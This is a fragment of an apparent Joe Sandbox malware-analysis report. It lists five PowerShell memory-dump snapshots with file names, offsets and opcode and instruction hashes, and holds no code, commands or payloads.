                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000002B.00000002.2479128429.00007FF83B8C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF83B8C0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_43_2_7ff83b8c0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                          • Instruction ID: f41609f16c808c3e670c3bb1d1442fc3d2581255d48f81d1bd0d160b19bb3676
                                                                                                          • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                          • Instruction Fuzzy Hash: 6901677111CB0C8FDB44EF0CE451AA5B7E0FB95364F50056DE58AC3661D636E882CB45
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000002D.00000002.2612787781.00007FF83B9B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF83B9B0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_45_2_7ff83b9b0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 9e0cca88ddc958648162579dbbf9d5df1dfa44bbaa5dc00cb388108b7846aab7
                                                                                                          • Instruction ID: 448650960787e8b8f3559d0f359025fe010e9d132214c699a19ce1357de61b25
                                                                                                          • Opcode Fuzzy Hash: 9e0cca88ddc958648162579dbbf9d5df1dfa44bbaa5dc00cb388108b7846aab7
                                                                                                          • Instruction Fuzzy Hash: F7C15672D0EA8A4FE769EB2848595B97FD1EF15780B0401BED88DCB1F7E918A801C781
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 0000002D.00000002.2610066598.00007FF83B8E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF83B8E0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_45_2_7ff83b8e0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                          • Instruction ID: bb80f9a20b2f17e1507288c1daa6324b403d5697f3fe5168e742a99da96a1349
                                                                                                          • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                          • Instruction Fuzzy Hash: 9001677121CB0C4FD744EF0CE451AA5B7E0FB95364F50056DE58AC3661D636E882CB45
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000035.00000002.2803532986.00007FF83B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF83B980000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_53_2_7ff83b980000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: bf359834af9ff781490436a1d20a44b0b85e0991ae3e40fc0bec20a11b9efd86
                                                                                                          • Instruction ID: 66c7b17477a7fe9eddfed2e62939d7abb2759c9696cc246c5c05de1b55edb6eb
                                                                                                          • Opcode Fuzzy Hash: bf359834af9ff781490436a1d20a44b0b85e0991ae3e40fc0bec20a11b9efd86
                                                                                                          • Instruction Fuzzy Hash: 78D13562D0DA8A4FE765EB28C8191B97BE1EF15790B0801BFD48DCB1F7EA18E805C751
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000035.00000002.2801171267.00007FF83B8B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF83B8B0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_53_2_7ff83b8b0000_powershell.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                                                                          • Instruction ID: befd4de0cc17ef4fb68dadb6532eb74f57a9ee4ce2977682fc1ab4bf47908d5a
                                                                                                          • Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                                                                                          • Instruction Fuzzy Hash: E101677121CB0C4FD744EF0CE451AA5B7E0FB95364F50056DE58AC3661D636E882CB45